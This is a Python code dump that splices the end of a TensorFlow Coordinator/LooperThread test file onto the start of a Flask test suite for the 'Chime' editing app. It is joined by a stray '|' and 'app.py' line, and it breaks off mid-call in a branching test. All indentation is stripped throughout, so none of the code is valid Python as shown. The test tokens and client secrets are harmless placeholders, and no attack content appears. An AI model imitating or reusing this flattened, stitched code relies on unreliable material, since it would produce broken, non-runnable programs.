def testStopAPI(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
coord.request_stop()
self.assertTrue(coord.should_stop())
self.assertTrue(coord.wait_for_stop(0.01))
def testStopAsync(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.1))
wait_for_stop_ev = threading.Event()
has_stopped_ev = threading.Event()
t = threading.Thread(target=StopOnEvent,
args=(coord, wait_for_stop_ev, has_stopped_ev))
t.start()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
wait_for_stop_ev.set()
has_stopped_ev.wait()
self.assertTrue(coord.wait_for_stop(0.05))
self.assertTrue(coord.should_stop())
def testJoin(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01,)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01,))]
for t in threads:
t.start()
coord.join(threads)
for t in threads:
self.assertFalse(t.is_alive())
def testJoinAllRegistered(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01, coord)),
threading.Thread(target=SleepABit, args=(0.02, coord)),
threading.Thread(target=SleepABit, args=(0.01, coord))]
for t in threads:
t.start()
WaitForThreadsToRegister(coord, 3)
coord.join()
for t in threads:
self.assertFalse(t.is_alive())
def testJoinSomeRegistered(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01, coord)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01, coord))]
for t in threads:
t.start()
WaitForThreadsToRegister(coord, 2)
# threads[1] is not registered we must pass it in.
coord.join(threads[1:1])
for t in threads:
self.assertFalse(t.is_alive())
def testJoinGraceExpires(self):
def TestWithGracePeriod(stop_grace_period):
coord = tf.train.Coordinator()
wait_for_stop_ev = threading.Event()
has_stopped_ev = threading.Event()
threads = [
threading.Thread(target=StopOnEvent,
args=(coord, wait_for_stop_ev, has_stopped_ev)),
threading.Thread(target=SleepABit, args=(10.0,))]
for t in threads:
t.daemon = True
t.start()
wait_for_stop_ev.set()
has_stopped_ev.wait()
with self.assertRaisesRegexp(RuntimeError, "threads still running"):
coord.join(threads, stop_grace_period_secs=stop_grace_period)
TestWithGracePeriod(1e-10)
TestWithGracePeriod(0.002)
TestWithGracePeriod(1.0)
def testJoinRaiseReportExcInfo(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), False)),
threading.Thread(target=RaiseInN,
args=(coord, 0.05, RuntimeError("Too late"), False))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinRaiseReportException(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), True)),
threading.Thread(target=RaiseInN,
args=(coord, 0.05, RuntimeError("Too late"), True))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinIgnoresOutOfRange(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01,
tf.errors.OutOfRangeError(None, None, "First"),
True))
]
for t in threads:
t.start()
coord.join(threads)
def testJoinIgnoresMyExceptionType(self):
coord = tf.train.Coordinator(clean_stop_exception_types=(ValueError,))
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, ValueError("Clean stop"), True))
]
for t in threads:
t.start()
coord.join(threads)
def testJoinRaiseReportExceptionUsingHandler(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.01, RuntimeError("First"))),
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.05, RuntimeError("Too late")))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testClearStopClearsExceptionToo(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), True)),
]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
coord.clear_stop()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("Second"), True)),
]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "Second"):
coord.join(threads)
def testRequestStopRaisesIfJoined(self):
coord = tf.train.Coordinator()
# Join the coordinator right away.
coord.join([])
reported = False
with self.assertRaisesRegexp(RuntimeError, "Too late"):
try:
raise RuntimeError("Too late")
except RuntimeError as e:
reported = True
coord.request_stop(e)
self.assertTrue(reported)
# If we clear_stop the exceptions are handled normally.
coord.clear_stop()
try:
raise RuntimeError("After clear")
except RuntimeError as e:
coord.request_stop(e)
with self.assertRaisesRegexp(RuntimeError, "After clear"):
coord.join([])
def testRequestStopRaisesIfJoined_ExcInfo(self):
# Same as testRequestStopRaisesIfJoined but using syc.exc_info().
coord = tf.train.Coordinator()
# Join the coordinator right away.
coord.join([])
reported = False
with self.assertRaisesRegexp(RuntimeError, "Too late"):
try:
raise RuntimeError("Too late")
except RuntimeError:
reported = True
coord.request_stop(sys.exc_info())
self.assertTrue(reported)
# If we clear_stop the exceptions are handled normally.
coord.clear_stop()
try:
raise RuntimeError("After clear")
except RuntimeError:
coord.request_stop(sys.exc_info())
with self.assertRaisesRegexp(RuntimeError, "After clear"):
coord.join([])
def _StopAt0(coord, n):
if n[0] == 0:
coord.request_stop()
else:
n[0] -= 1
class LooperTest(tf.test.TestCase):
def testTargetArgs(self):
n = [3]
coord = tf.train.Coordinator()
thread = tf.train.LooperThread.loop(coord, 0, target=_StopAt0,
args=(coord, n))
coord.join([thread])
self.assertEqual(0, n[0])
def testTargetKwargs(self):
n = [3]
coord = tf.train.Coordinator()
thread = tf.train.LooperThread.loop(coord, 0, target=_StopAt0,
kwargs={"coord": coord, "n": n})
coord.join([thread])
self.assertEqual(0, n[0])
def testTargetMixedArgs(self):
n = [3]
coord = tf.train.Coordinator()
thread = tf.train.LooperThread.loop(coord, 0, target=_StopAt0,
args=(coord,), kwargs={"n": n})
coord.join([thread])
self.assertEqual(0, n[0])
if __name__ == "__main__":
tf.test.main()
|
app.py
|
# -- coding: utf-8 --
from __future__ import absolute_import
from unittest import main, TestCase
from tempfile import mkdtemp
from os.path import join, exists, dirname, isdir, abspath, sep
from urlparse import urlparse, urljoin
from os import environ, mkdir
from shutil import rmtree, copytree
from re import search, sub
import random
from datetime import date, timedelta, datetime
import sys
from chime.repo_functions import ChimeRepo
from slugify import slugify
from multiprocessing import Process
import time
import logging
import tempfile
logging.disable(logging.CRITICAL)
repo_root = abspath(join(dirname(__file__), '..'))
sys.path.insert(0, repo_root)
from box.util.rotunicode import RotUnicode
from httmock import response, HTTMock
from mock import MagicMock, patch
from bs4 import Comment, BeautifulSoup
from chime import (
create_app, repo_functions, google_api_functions, view_functions,
publish, errors)
from chime import constants
from chime import chime_activity
from unit.chime_test_client import ChimeTestClient
import codecs
codecs.register(RotUnicode.search_function)
# these patterns help us search the HTML of a response to determine if the expected page loaded
PATTERN_BRANCH_COMMENT = u'<!-- branch: {} -->'
PATTERN_AUTHOR_COMMENT = u'<!-- author: {} -->'
PATTERN_TASK_COMMENT = u'<!-- task: {} -->'
PATTERN_TEMPLATE_COMMENT = u'<!-- template name: {} -->'
PATTERN_FILE_COMMENT = u'<!-- file type: {file_type}, file name: {file_name}, file title: {file_title} -->'
PATTERN_OVERVIEW_ITEM_CREATED = u'<p>The "{created_name}" {created_type} was created by {author_email}.</p>'
PATTERN_OVERVIEW_ACTIVITY_STARTED = u'<p>The "{activity_name}" activity was started by {author_email}.</p>'
PATTERN_OVERVIEW_COMMENT_BODY = u'<div class="comment__body">{comment_body}</div>'
PATTERN_OVERVIEW_ITEM_DELETED = u'<p>The "{deleted_name}" {deleted_type} {deleted_also}was deleted by {author_email}.</p>'
PATTERN_FLASH_TASK_DELETED = u'You deleted the "{description}" activity!'
PATTERN_FLASH_CREATED_CATEGORY = u'Created a new topic named {title}! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FLASH_SAVED_CATEGORY = u'Saved changes to the {title} topic! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FLASH_CREATED_ARTICLE = u'Created a new article named {title}! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FLASH_SAVED_ARTICLE = u'Saved changes to the {title} article! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FLASH_DELETED_CATEGORY = u'The "{title}" topic {containing}was deleted! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FLASH_DELETED_ARTICLE = u'The "{title}" article was deleted! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FORM_CATEGORY_TITLE = u'<input name="en-title" type="text" value="{title}" class="directory-modify__name" placeholder="Crime Statistics and Maps">'
PATTERN_FORM_CATEGORY_DESCRIPTION = u'<textarea name="en-description" class="directory-modify__description" placeholder="Crime statistics and reports by district and map">{description}</textarea>'
# review stuff
PATTERN_UNREVIEWED_EDITS_LINK = u'<a href="/tree/{branch_name}/edit/">'
PATTERN_FEEDBACK_REQUESTED_LINK = u'<a href="/tree/{branch_name}/" class="toolbar__item button">Feedback requested</a>'
PATTERN_READY_TO_PUBLISH_LINK = u'<a href="/tree/{branch_name}/" class="toolbar__item button">Ready to publish</a>'
class TestAppConfig (TestCase):
# in TestAppConfig
def test_missing_values(self):
self.assertRaises(KeyError, lambda: create_app({}))
# in TestAppConfig
def test_present_values(self):
create_app_environ = {}
create_app_environ['RUNNING_STATE_DIR'] = 'Yo'
create_app_environ['GA_CLIENT_ID'] = 'Yo'
create_app_environ['GA_CLIENT_SECRET'] = 'Yo'
create_app_environ['LIVE_SITE_URL'] = 'Hey'
create_app_environ['BROWSERID_URL'] = 'Hey'
create_app(create_app_environ)
# in TestAppConfig
def test_error_template_args(self):
''' Default error template args are generated as expected
'''
create_app_environ = {}
create_app_environ['RUNNING_STATE_DIR'] = 'Yo'
create_app_environ['GA_CLIENT_ID'] = 'Yo'
create_app_environ['GA_CLIENT_SECRET'] = 'Yo'
create_app_environ['BROWSERID_URL'] = 'Hey'
create_app_environ['LIVE_SITE_URL'] = 'Hey'
fake_support_email = u'support@example.com'
fake_support_phone_number = u'(123) 456-7890'
create_app_environ['SUPPORT_EMAIL_ADDRESS'] = fake_support_email
create_app_environ['SUPPORT_PHONE_NUMBER'] = fake_support_phone_number
app = create_app(create_app_environ)
template_args = errors.common_error_template_args(app.config)
self.assertEqual(len(template_args), 3)
self.assertTrue('activities_path' in template_args)
self.assertTrue('support_email' in template_args)
self.assertTrue('support_phone_number' in template_args)
self.assertEqual(template_args['support_email'], fake_support_email)
self.assertEqual(template_args['support_phone_number'], fake_support_phone_number)
# in TestAppConfig
def test_for_constant_name_conflicts(self):
''' None of the constant names defined in constants.py conflict with reserved config variable names
'''
flask_reserved_config_names = ['DEBUG', 'TESTING', 'PROPAGATE_EXCEPTIONS', 'PRESERVE_CONTEXT_ON_EXCEPTION', 'SECRET_KEY', 'SESSION_COOKIE_NAME', 'SESSION_COOKIE_DOMAIN', 'SESSION_COOKIE_PATH', 'SESSION_COOKIE_HTTPONLY', 'SESSION_COOKIE_SECURE', 'PERMANENT_SESSION_LIFETIME', 'USE_X_SENDFILE', 'LOGGER_NAME', 'SERVER_NAME', 'APPLICATION_ROOT', 'MAX_CONTENT_LENGTH', 'SEND_FILE_MAX_AGE_DEFAULT', 'TRAP_HTTP_EXCEPTIONS', 'TRAP_BAD_REQUEST_ERRORS', 'PREFERRED_URL_SCHEME', 'JSON_AS_ASCII', 'JSON_SORT_KEYS', 'JSONIFY_PRETTYPRINT_REGULAR']
chime_reserved_config_names = ['RUNNING_STATE_DIR', 'REPO_PATH', 'WORK_PATH', 'AUTH_DATA_HREF', 'BROWSERID_URL', 'GA_CLIENT_ID', 'GA_CLIENT_SECRET', 'GA_REDIRECT_URI', 'SUPPORT_EMAIL_ADDRESS', 'SUPPORT_PHONE_NUMBER', 'GDOCS_CLIENT_ID', 'GDOCS_CLIENT_SECRET', 'GITHUB_CLIENT_ID', 'GITHUB_CLIENT_SECRET', 'LIVE_SITE_URL', 'PUBLISH_SERVICE_URL']
check_names = flask_reserved_config_names + chime_reserved_config_names
for reserved_name in check_names:
self.assertFalse(hasattr(constants, reserved_name), u'The reserved config variable name {} is present in constants!'.format(reserved_name))
class TestApp (TestCase):
def setUp(self):
self.old_tempdir, tempfile.tempdir = tempfile.tempdir, mkdtemp(prefix='chime-TestApp-')
self.work_path = mkdtemp(prefix='chime-repo-clones-')
self.publish_path = mkdtemp(prefix='chime-publish-path-')
repo_path = dirname(abspath(__file__)) + '/../test-app.git'
temp_repo_dir = mkdtemp(prefix='chime-root')
temp_repo_path = temp_repo_dir + '/test-app.git'
copytree(repo_path, temp_repo_path)
self.origin = ChimeRepo(temp_repo_path)
repo_functions.ignore_task_metadata_on_merge(self.origin)
self.clone1 = self.origin.clone(mkdtemp(prefix='chime-'))
repo_functions.ignore_task_metadata_on_merge(self.clone1)
fake_author_email = u'erica@example.com'
self.session = dict(email=fake_author_email)
environ['GIT_AUTHOR_NAME'] = ' '
environ['GIT_COMMITTER_NAME'] = ' '
environ['GIT_AUTHOR_EMAIL'] = self.session['email']
environ['GIT_COMMITTER_EMAIL'] = self.session['email']
create_app_environ = {}
create_app_environ['SINGLE_USER'] = 'Yes'
create_app_environ['GA_CLIENT_ID'] = 'client_id'
create_app_environ['GA_CLIENT_SECRET'] = 'meow_secret'
self.ga_config_dir = mkdtemp(prefix='chime-config-')
create_app_environ['RUNNING_STATE_DIR'] = self.ga_config_dir
create_app_environ['WORK_PATH'] = self.work_path
create_app_environ['REPO_PATH'] = temp_repo_path
create_app_environ['AUTH_DATA_HREF'] = 'http://example.com/auth.csv'
create_app_environ['BROWSERID_URL'] = 'http://localhost'
create_app_environ['LIVE_SITE_URL'] = 'http://example.org/'
create_app_environ['PUBLISH_PATH'] = self.publish_path
create_app_environ['SUPPORT_EMAIL_ADDRESS'] = u'support@example.com'
create_app_environ['SUPPORT_PHONE_NUMBER'] = u'(123) 456-7890'
self.app = create_app(create_app_environ)
# write a tmp config file
config_values = {
"access_token": "meowser_token",
"refresh_token": "refresh_meows",
"profile_id": "12345678",
"project_domain": ""
}
with self.app.app_context():
google_api_functions.write_ga_config(config_values, self.app.config['RUNNING_STATE_DIR'])
random.choice = MagicMock(return_value="P")
self.test_client = self.app.test_client()
def tearDown(self):
rmtree(tempfile.tempdir)
tempfile.tempdir = self.old_tempdir
def auth_csv_example_disallowed(self, url, request):
if url.geturl() == 'http://example.com/auth.csv':
return response(200, '''Email domain,Organization\n''')
raise Exception('Asked for unknown URL ' + url.geturl())
def auth_csv_example_allowed(self, url, request):
if url.geturl() == 'http://example.com/auth.csv':
return response(200, '''Email domain,Organization\nexample.com,Example Org\n*,Anyone''')
raise Exception('Asked for unknown URL ' + url.geturl())
def mock_persona_verify_erica(self, url, request):
if url.geturl() == 'https://verifier.login.persona.org/verify':
return response(200, '''{"status": "okay", "email": "erica@example.com"}''', headers=dict(Link='<https://api.github.com/user/337792/repos?page=1>; rel="prev", <https://api.github.com/user/337792/repos?page=1>; rel="first"'))
else:
return self.auth_csv_example_allowed(url, request)
def mock_persona_verify_non_roman(self, url, request):
if url.geturl() == 'https://verifier.login.persona.org/verify':
return response(200, '''{"status": "okay", "email": "੯ूᵕू ໒꒱ƶƵ@快速狐狸.com"}''', headers=dict(Link='<https://api.github.com/user/337792/repos?page=1>; rel="prev", <https://api.github.com/user/337792/repos?page=1>; rel="first"'))
else:
return self.auth_csv_example_allowed(url, request)
def mock_persona_verify_frances(self, url, request):
if url.geturl() == 'https://verifier.login.persona.org/verify':
return response(200, '''{"status": "okay", "email": "frances@example.com"}''', headers=dict(Link='<https://api.github.com/user/337792/repos?page=1>; rel="prev", <https://api.github.com/user/337792/repos?page=1>; rel="first"'))
else:
return self.auth_csv_example_allowed(url, request)
def mock_persona_verify_william(self, url, request):
if url.geturl() == 'https://verifier.login.persona.org/verify':
return response(200, '''{"status": "okay", "email": "william@example.org"}''', headers=dict(Link='<https://api.github.com/user/337792/repos?page=1>; rel="prev", <https://api.github.com/user/337792/repos?page=1>; rel="first"'))
else:
return self.auth_csv_example_allowed(url, request)
def mock_google_authorization(self, url, request):
if 'https://accounts.google.com/o/oauth2/auth' in url.geturl():
return response(200, '''{"access_token": "meowser_token", "token_type": "meowser_type", "refresh_token": "refresh_meows", "expires_in": 3920}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_successful_google_callback(self, url, request):
if google_api_functions.GOOGLE_ANALYTICS_TOKENS_URL in url.geturl():
return response(200, '''{"access_token": "meowser_token", "token_type": "meowser_type", "refresh_token": "refresh_meows", "expires_in": 3920}''')
elif google_api_functions.GOOGLE_PLUS_WHOAMI_URL in url.geturl():
return response(200, '''{"displayName": "Jane Doe", "emails": [{"type": "account", "value": "erica@example.com"}]}''')
elif google_api_functions.GOOGLE_ANALYTICS_PROPERTIES_URL in url.geturl():
return response(200, '''{"items": [{"defaultProfileId": "12345678", "name": "Property One", "websiteUrl": "http://propertyone.example.com"}, {"defaultProfileId": "87654321", "name": "Property Two", "websiteUrl": "http://propertytwo.example.com"}]}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_failed_google_callback(self, url, request):
if google_api_functions.GOOGLE_ANALYTICS_TOKENS_URL in url.geturl():
return response(500, '''{}''')
elif google_api_functions.GOOGLE_PLUS_WHOAMI_URL in url.geturl():
return response(200, '''{"displayName": "Jane Doe", "emails": [{"type": "account", "value": "erica@example.com"}]}''')
elif google_api_functions.GOOGLE_ANALYTICS_PROPERTIES_URL in url.geturl():
return response(200, '''{"items": [{"defaultProfileId": "12345678", "name": "Property One", "websiteUrl": "http://propertyone.example.com"}, {"defaultProfileId": "87654321", "name": "Property Two", "websiteUrl": "http://propertytwo.example.com"}]}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_google_invalid_credentials_response(self, url, request):
if 'https://www.googleapis.com/analytics/' in url.geturl() or google_api_functions.GOOGLE_ANALYTICS_PROPERTIES_URL in url.geturl():
return response(401, '''{"error": {"code": 401, "message": "Invalid Credentials", "errors": [{"locationType": "header", "domain": "global", "message": "Invalid Credentials", "reason": "authError", "location": "Authorization"}]}}''')
elif google_api_functions.GOOGLE_PLUS_WHOAMI_URL in url.geturl():
return response(403, '''{"error": {"code": 403, "message": "Access Not Configured. The API (Google+ API) is not enabled for your project. Please use the Google Developers Console to update your configuration.", "errors": [{"domain": "usageLimits", "message": "Access Not Configured. The API (Google+ API) is not enabled for your project. Please use the Google Developers Console to update your configuration.", "reason": "accessNotConfigured", "extendedHelp": "https://console.developers.google.com"}]}}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_google_no_properties_response(self, url, request):
if google_api_functions.GOOGLE_ANALYTICS_PROPERTIES_URL in url.geturl():
return response(200, '''{"kind": "analytics#webproperties", "username": "erica@example.com", "totalResults": 0, "startIndex": 1, "itemsPerPage": 1000, "items": []}''')
elif google_api_functions.GOOGLE_PLUS_WHOAMI_URL in url.geturl():
return response(200, '''{"displayName": "Jane Doe", "emails": [{"type": "account", "value": "erica@example.com"}]}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_google_analytics(self, url, request):
start_date = (date.today() - timedelta(days=7)).isoformat()
end_date = date.today().isoformat()
url_string = url.geturl()
if 'ids=ga%3A12345678' in url_string and 'end-date=' + end_date in url_string and 'start-date=' + start_date in url_string and 'filters=ga%3ApagePath%3D~%28hello.html%7Chello%29' in url_string:
return response(200, '''{"ga:previousPagePath": "/about/", "ga:pagePath": "/lib/", "ga:pageViews": "12", "ga:avgTimeOnPage": "56.17", "ga:exiteRate": "43.75", "totalsForAllResults": {"ga:pageViews": "24", "ga:avgTimeOnPage": "67.36363636363636"}}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_internal_server_error(self, url, request):
from flask import abort
abort(500)
def mock_exception(self, url, request):
raise Exception(u'This is a generic exception.')
# in TestApp
def test_no_cache_headers(self):
''' The expected no-cache headers are in the server response.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
erica.open_link(constants.ROUTE_ACTIVITY)
# The static no-cache headers are as expected
self.assertEqual(erica.headers['Cache-Control'], 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0')
self.assertEqual(erica.headers['Pragma'], 'no-cache')
self.assertEqual(erica.headers['Expires'], '-1')
# The last modified date is within 10 seconds of now
last_modified = datetime.strptime(erica.headers['Last-Modified'], '%Y-%m-%d %H:%M:%S.%f')
delta = datetime.now() - last_modified
self.assertTrue(delta.seconds < 10)
# in TestApp
def test_bad_login(self):
''' Check basic log in / log out flow without talking to Persona.
'''
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('erica@example.com' in response.data)
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.auth_csv_example_disallowed):
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Create' in response.data)
# in TestApp
def test_login(self):
''' Check basic log in / log out flow without talking to Persona.
'''
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Start' in response.data)
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertTrue('Start' in response.data)
self.assertTrue('http://example.org' in response.data, 'Should see LIVE_SITE_URL in response')
response = self.test_client.post('/sign-out')
self.assertEqual(response.status_code, 200)
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Start' in response.data)
# in TestApp
def test_login_splat(self):
''' Check basic log in / log out flow without talking to Persona.
'''
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Start' in response.data)
with HTTMock(self.mock_persona_verify_william):
response = self.test_client.post('/sign-in', data={'assertion': 'william@example.org'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertTrue('Start' in response.data)
# in TestApp
def test_default_auth_href_warning(self):
''' Check basic log in / log out flow without talking to Persona.
'''
with patch('chime.view_functions.AUTH_DATA_HREF_DEFAULT', new='http://example.com/auth.csv'):
response = self.test_client.get('/not-allowed')
expected = 'Your Chime <code>AUTH_DATA_HREF</code> is set to default value.'
self.assertTrue(expected in response.data, 'Should see a warning')
# in TestApp
@patch('chime.view_functions.AUTH_CHECK_LIFESPAN', new=1.0)
def test_login_timeout(self):
''' Check basic log in / log out flow with auth check lifespan.
'''
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Start' in response.data)
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertTrue('Start' in response.data)
with patch('chime.view_functions.get_auth_data_file') as get_auth_data_file:
# Show that email status does not require a call to auth CSV.
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertEqual(response.status_code, 200, 'Should have worked')
self.assertEqual(get_auth_data_file.call_count, 0, 'Should not have called get_auth_data_file()')
# Show that a call to auth CSV was made, outside the timeout period.
time.sleep(1.1)
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertEqual(get_auth_data_file.call_count, 1, 'Should have called get_auth_data_file()')
with HTTMock(self.auth_csv_example_allowed):
# Show that email status was correctly updatedw with call to CSV.
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertEqual(response.status_code, 200, 'Should have worked')
response = self.test_client.post('/sign-out')
self.assertEqual(response.status_code, 200)
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Start' in response.data)
# in TestApp
def test_need_description_to_start_activity(self):
''' You need a description to start a new activity
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
pattern_template_comment_stripped = sub(ur'<!--|-->', u'', PATTERN_TEMPLATE_COMMENT)
flash_message_text = u'Please describe what you\'re doing when you start a new activity!'
# start a new task without a description
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'')
# the activities-list template reloaded
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'activities-list') in comments)
# verify that there's a flash message warning about submitting an empty description
self.assertEqual(flash_message_text, erica.soup.find('li', class_='flash').text)
# in TestApp
def test_whitespace_stripped_from_description(self):
''' Carriage returns, tabs, spaces are stripped from task descriptions before they're saved.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
# start a new task with a lot of random whitespace
erica.open_link(constants.ROUTE_ACTIVITY)
task_description = u'I think\n\r\n\rI am so \t\t\t coool!!\n\n\nYeah.\n\nOK\n\rERWEREW dkkdk'
task_description_stripped = u'I think I am so coool!! Yeah. OK ERWEREW dkkdk'
erica.start_task(description=task_description)
# the stripped comment is in the HTML
pattern_task_comment_stripped = sub(ur'<!--|-->', u'', PATTERN_TASK_COMMENT)
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_task_comment_stripped.format(task_description_stripped) in comments)
# the stripped comment is in the task metadata
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
task_metadata = repo_functions.get_task_metadata_for_branch(repo, erica.get_branch_name())
self.assertEqual(task_description_stripped, task_metadata['task_description'])
# in TestApp
def test_notification_on_create_category(self):
''' You get a flash notification when you create a category
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Lick Water Droplets From Leaves for Leopard Geckos')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Create a category
category_name = u'Rubber Plants'
category_slug = slugify(category_name)
erica.add_category(category_name=category_name)
# the category is correctly represented on the page
self.assertIsNotNone(erica.soup.find(lambda tag: bool(tag.name == 'a' and category_name in tag.text)))
self.assertIsNotNone(erica.soup.find(lambda tag: bool(tag.name == 'a' and category_slug in tag['href'])))
# a flash message appeared
self.assertEqual(PATTERN_FLASH_CREATED_CATEGORY.format(title=category_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_notifications_on_create_edit_and_delete_article(self):
''' You get a flash notification when you create an article
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Lick Water Droplets From Leaves for Leopard Geckos')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Create a category and sub-category
category_name = u'Rubber Plants'
subcategory_name = u'Leaves'
erica.add_category(category_name=category_name)
erica.add_subcategory(subcategory_name=subcategory_name)
subcategory_path = erica.path
# Create an article
article_name = u'Water Droplets'
erica.add_article(article_name=article_name)
# a flash message appeared
self.assertEqual(PATTERN_FLASH_CREATED_ARTICLE.format(title=article_name), erica.soup.find('li', class_='flash').text)
# edit the article
erica.edit_article(title_str=article_name, body_str=u'Watch out for poisonous insects.')
# a flash message appeared
self.assertEqual(PATTERN_FLASH_SAVED_ARTICLE.format(title=article_name), erica.soup.find('li', class_='flash').text)
# delete the article
erica.open_link(subcategory_path)
erica.delete_article(article_name)
# a flash message appeared
self.assertEqual(PATTERN_FLASH_DELETED_ARTICLE.format(title=article_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_branches(self):
''' Check basic branching functionality.
'''
fake_task_description = u'do things for somebody else'
fake_author_email = u'erica@example.com'
fake_endorser_email = u'frances@example.com'
fake_page_slug = u'hello'
fake_page_path = u'{}/index.{}'.format(fake_page_slug, constants.CONTENT_FILE_EXTENSION)
fake_page_content = u'People of earth we salute you.'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# create a new branch
response = self.test_client.post('/start', data={'task_description': fake_task_description}, follow_redirects=True)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_TASK_COMMENT.format(fake_task_description) in response.data)
self.assertTrue(PATTERN_AUTHOR_COMMENT.format(fake_author_email) in response.data)
# extract the generated branch name from the returned HTML
generated_branch_search = search(r'<!-- branch: (.{{{}}}) -->'.format(repo_functions.BRANCH_NAME_LENGTH), response.data)
self.assertIsNotNone(generated_branch_search)
try:
generated_branch_name = generated_branch_search.group(1)
except AttributeError:
raise Exception('No match for generated branch name.')
with HTTMock(self.mock_google_analytics):
# create a new file
response = self.test_client.post('/tree/{}/edit/'.format(generated_branch_name),
